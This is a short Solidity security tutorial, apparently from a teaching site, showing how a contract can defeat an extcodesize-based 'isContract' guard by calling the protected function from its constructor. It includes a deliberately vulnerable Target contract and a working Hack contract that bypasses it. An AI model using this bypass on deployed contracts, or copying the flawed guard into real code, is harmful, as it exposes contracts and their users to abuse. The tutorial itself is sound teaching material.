Vulnerability
If an address is a contract then the size of code stored at the address will be greater than 0 right?
Let's see how we can create a contract with code size returned by extcodesize equal to 0.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;
contract Target {
function isContract(address account) public view returns (bool) {
// This method relies on extcodesize, which returns 0 for contracts in
// construction, since the code is only stored at the end of the
// constructor execution.
uint size;
assembly {
size := extcodesize(account)
}
return size > 0;
}
bool public pwned = false;
function protected() external {
require(!isContract(msg.sender), "no contract allowed");
pwned = true;
}
}
contract FailedAttack {
// Attempting to call Target.protected will fail,
// Target block calls from contract
function pwn(address _target) external {
// This will fail
Target(_target).protected();
}
}
contract Hack {
bool public isContract;
address public addr;
// When contract is being created, code size (extcodesize) is 0.
// This will bypass the isContract() check
constructor(address _target) {
isContract = Target(_target).isContract(address(this));
addr = address(this);
// This will work
Target(_target).protected();
}
}
Try on Remix
